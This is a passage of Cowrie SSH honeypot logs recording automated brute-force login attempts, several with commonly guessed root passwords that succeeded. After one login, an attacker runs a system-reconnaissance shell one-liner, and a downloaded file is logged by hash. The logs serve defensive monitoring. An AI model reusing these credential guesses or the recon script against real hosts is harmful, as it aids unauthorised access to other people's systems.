,"rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:47.389334Z","src_ip":"83.168.105.65","session":"f4a722be7d3d"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:47.503479Z","src_ip":"83.168.105.65","session":"f4a722be7d3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33876,"dst_ip":"1.2.3.4","dst_port":22,"session":"11a2abc4f8cd","protocol":"ssh","message":"New connection: 212.227.125.160:33876 (1.2.3.4:22) [session: 11a2abc4f8cd]","sensor":"my-vps","timestamp":"2025-08-26T11:55:48.156376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:48.186801Z","src_ip":"212.227.125.160","session":"11a2abc4f8cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:48.230022Z","src_ip":"212.227.125.160","session":"11a2abc4f8cd"}
{"eventid":"cowrie.login.failed","username":"hestiaweb","password":"hestiaweb","message":"login attempt [hestiaweb/hestiaweb] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:48.449717Z","src_ip":"212.227.125.160","session":"11a2abc4f8cd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:48.541996Z","src_ip":"83.168.105.65","session":"f4a722be7d3d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:49.520740Z","src_ip":"212.227.125.160","session":"11a2abc4f8cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45442,"dst_ip":"1.2.3.4","dst_port":22,"session":"193b738e71e3","protocol":"ssh","message":"New connection: 212.227.235.229:45442 (1.2.3.4:22) [session: 193b738e71e3]","sensor":"my-vps","timestamp":"2025-08-26T11:55:53.565238Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34642,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca02a4475310","protocol":"ssh","message":"New connection: 212.227.125.160:34642 (1.2.3.4:22) [session: ca02a4475310]","sensor":"my-vps","timestamp":"2025-08-26T11:55:54.080643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:54.081316Z","src_ip":"212.227.125.160","session":"ca02a4475310"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:54.131823Z","src_ip":"212.227.125.160","session":"ca02a4475310"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:54.169191Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:55:54.169844Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.login.failed","username":"amandabackup","password":"amandabackup","message":"login attempt [amandabackup/amandabackup] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:54.299087Z","src_ip":"212.227.125.160","session":"ca02a4475310"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:55.378926Z","src_ip":"212.227.125.160","session":"ca02a4475310"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:55:55.463947Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:55:56.417570Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.418353Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.419414Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.420661Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.421981Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.422912Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.423654Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.424660Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.425295Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.425970Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.426755Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.427451Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.428003Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.941597Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.942589Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:56.944354Z","src_ip":"212.227.235.229","session":"193b738e71e3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37756,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b33c46540c7","protocol":"ssh","message":"New connection: 196.251.86.249:37756 (1.2.3.4:22) [session: 1b33c46540c7]","sensor":"my-vps","timestamp":"2025-08-26T11:55:57.112361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:57.708800Z","src_ip":"196.251.86.249","session":"1b33c46540c7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:55:57.709710Z","src_ip":"196.251.86.249","session":"1b33c46540c7"}
{"eventid":"cowrie.login.failed","username":"git","password":"1234qwer","message":"login attempt [git/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:59.686929Z","src_ip":"196.251.86.249","session":"1b33c46540c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35414,"dst_ip":"1.2.3.4","dst_port":22,"session":"a60e1e8bcac0","protocol":"ssh","message":"New connection: 212.227.125.160:35414 (1.2.3.4:22) [session: a60e1e8bcac0]","sensor":"my-vps","timestamp":"2025-08-26T11:55:59.936443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:59.938335Z","src_ip":"212.227.125.160","session":"a60e1e8bcac0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:59.987540Z","src_ip":"212.227.125.160","session":"a60e1e8bcac0"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:56:00.215952Z","src_ip":"212.227.125.160","session":"a60e1e8bcac0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:56:00.364795Z","src_ip":"212.227.125.160","session":"a60e1e8bcac0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:56:00.365469Z","src_ip":"212.227.125.160","session":"a60e1e8bcac0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:00.431607Z","src_ip":"212.227.125.160","session":"a60e1e8bcac0"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:00.432634Z","src_ip":"212.227.125.160","session":"a60e1e8bcac0"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:01.213371Z","src_ip":"196.251.86.249","session":"1b33c46540c7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43206,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a013b98070f","protocol":"ssh","message":"New connection: 83.168.105.65:43206 (1.2.3.4:22) [session: 7a013b98070f]","sensor":"my-vps","timestamp":"2025-08-26T11:56:02.656787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:02.657593Z","src_ip":"83.168.105.65","session":"7a013b98070f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:56:02.695141Z","src_ip":"83.168.105.65","session":"7a013b98070f"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-26T11:56:02.808453Z","src_ip":"83.168.105.65","session":"7a013b98070f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:56:03.848220Z","src_ip":"83.168.105.65","session":"7a013b98070f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36180,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f12578ff876","protocol":"ssh","message":"New connection: 212.227.125.160:36180 (1.2.3.4:22) [session: 8f12578ff876]","sensor":"my-vps","timestamp":"2025-08-26T11:56:05.862918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:56:05.863574Z","src_ip":"212.227.125.160","session":"8f12578ff876"}
